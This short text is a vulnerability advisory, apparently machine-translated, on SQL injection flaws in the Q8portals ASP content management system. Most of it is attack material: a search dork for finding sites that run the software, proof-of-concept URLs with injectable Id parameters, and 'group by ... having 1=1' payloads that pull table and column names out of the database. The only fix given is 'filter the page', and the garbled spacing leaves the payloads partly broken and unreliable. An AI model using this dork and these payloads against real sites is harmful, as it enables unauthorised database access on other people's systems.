Vulnerability Description: Q8portals is a foreign asp content management system. Due to design defects, it causes SQL injection vulnerabilities.
Vulnerability types: SQL Injection, script injection, blind injection, and Injection Vulnerabilities
Keywords: intext: Powered by: q8portals.com
Vulnerability Testing: directly throwing it into related tools ......
[P0C]: http://www.bkjia.com/portal/articles_en.asp? Id = [SQL INJECTION]
[P0C]: http://www.bkjia.com/portal/contents_en.asp? Id = 4 [SQL INJECTION]
[DEMO]:
Http://www.bkjia.com/portal/articles_en.asp? Id =-4% 20 group + by + ARTICLES. ARTICLE_ID, ARTICLES. ARTICLE_TITLE_AR, ARTICLES. ARTICLE_DESC _
AR + having %201 = 1 --
Http://www.bkjia.com/portal/contents_en.asp? Id = 4% 20 group + by + CONTENTS. CONTENT_ID, CONTENTS. CONTENT_NAME_AR, CONTENTS. CONTENT _
DESC_AR --
Fixed: filter the page